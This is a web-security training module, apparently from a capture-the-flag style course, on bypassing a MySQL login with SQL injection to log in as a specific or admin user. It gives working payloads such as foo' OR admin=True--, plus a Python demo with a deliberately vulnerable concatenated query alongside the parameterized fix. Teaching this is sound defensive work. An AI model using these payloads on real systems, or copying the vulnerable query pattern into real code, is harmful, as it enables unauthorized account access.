SQL Injection

(MySQL) Changing WHERE clauses to bypass authentication (specific user)

Easy
10 min

In the last module, we learned how a programming error (pasting user input straight into the SQL text) lets an attacker change the structure of the queries the application runs.

We did an exercise where we bypassed the login by forcing the database to return every user row regardless of the password, so the application logged us in as the first row returned, which happened to be the system administrator.

But what if we want to log in as a different user? In that case we need to add a condition to the WHERE clause that makes the database return only the desired user instead of every user.

If we knew the administrator's email address, we could approach the problem, for example, by entering foo' OR email='admin@ha-target.com'--  as the password (note the space after --), resulting in the SQL:

SELECT * FROM user WHERE email='diibadaabaduu@ha-target.com' AND password='foo' OR email='admin@ha-target.com'-- '

Because AND binds more tightly than OR, MySQL evaluates this WHERE clause as (email='...' AND password='foo') OR email='admin@ha-target.com', so the administrator's row matches even though the first half is false. The -- comment swallows the application's own closing quote; in MySQL, -- only starts a comment when it is followed by whitespace, so the trailing space matters (# works as an alternative comment marker).

However, we do not know the administrator's email address. What we do know is that the user table has a column named admin of boolean type (in MySQL a TINYINT(1), where True is stored as 1 and False as 0).

We should be able to log in as an administrator as long as the query returns only rows where admin is True. If several accounts are administrators, the application will log us in as the first of those rows. Try the practice below and get the application to execute a query like this:

SELECT * FROM user WHERE email='foo@ha-target.com' AND password='foo' OR admin=True-- '
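The following is an added example, not code from the Hakatemia lab: a small Python reproduction of the vulnerable login that shows both payloads from this page (the known-email condition and the admin=True condition) alongside the previous module's OR 1=1 trick, and the parameterized query that stops all three. It assumes an in-memory SQLite database standing in for the lab's MySQL server, a user table with email, password and admin columns, and constructed sample rows; the admin account is deliberately not the first row so the difference between the payloads is visible.

```python
import sqlite3

# Constructed sample rows for this demo (not the lab's real data).
# The admin is deliberately NOT the first row, so a plain "OR 1=1" bypass
# lands on the wrong account while "OR admin=True" lands on the admin.
SAMPLE_USERS = [
    ("diibadaabaduu@ha-target.com", "foo", 0),
    ("admin@ha-target.com", "correct-horse-battery", 1),
]


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the lab's MySQL database (assumed table layout).
    Passwords are stored in plaintext only so the query shape matches the
    module's examples; a real application would store a password hash."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE user (id INTEGER PRIMARY KEY, email TEXT, password TEXT, admin BOOLEAN)"
    )
    conn.executemany(
        "INSERT INTO user (email, password, admin) VALUES (?, ?, ?)", SAMPLE_USERS
    )
    conn.commit()
    return conn


def vulnerable_query(email: str, password: str) -> str:
    """The programming error the module describes: user input is concatenated
    into the SQL text, so quotes and comment markers become live syntax."""
    return f"SELECT * FROM user WHERE email='{email}' AND password='{password}'"


def login_vulnerable(conn: sqlite3.Connection, email: str, password: str):
    """Mimics the lab application: run the concatenated query and log in as
    whichever row comes back first. Returns (id, email, password, admin) or None."""
    return conn.execute(vulnerable_query(email, password)).fetchone()


def login_safe(conn: sqlite3.Connection, email: str, password: str):
    """Parameterized version: the driver sends the values separately from the
    SQL text, so input can only ever be compared, never change the WHERE clause."""
    return conn.execute(
        "SELECT * FROM user WHERE email=? AND password=?", (email, password)
    ).fetchone()


# Payloads go in the password field. The trailing space after "--" is required
# for MySQL to treat it as a comment; SQLite is lenient, but the space is kept
# so the same strings work against the lab's MySQL backend.
BYPASS_ANY_USER = "foo' OR 1=1-- "                         # previous module
BYPASS_KNOWN_EMAIL = "foo' OR email='admin@ha-target.com'-- "  # needs the email
BYPASS_ADMIN_FLAG = "foo' OR admin=True-- "                # this module


if __name__ == "__main__":
    db = make_db()
    for label, pw in [("OR 1=1", BYPASS_ANY_USER),
                      ("known email", BYPASS_KNOWN_EMAIL),
                      ("admin=True", BYPASS_ADMIN_FLAG)]:
        print(f"{label:12} vulnerable   -> {login_vulnerable(db, 'foo@ha-target.com', pw)}")
        print(f"{'':12} parameterized -> {login_safe(db, 'foo@ha-target.com', pw)}")
```

Running it shows OR 1=1 returning the first (non-admin) row, both targeted payloads returning the admin row, and the parameterized login returning nothing for every payload because the quote and comment characters are just part of the compared password value.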

MySQLi Login Bypass 2

In this lab, we dive a little deeper into SQL syntax, adding conditions to the WHERE clause with the aim of logging in as a specific user instead of whichever user the database returns first.

Objective

Log in as a user whose value in the admin column is True.

Exercises

Flag

Find the flag from the lab environment and enter it below.
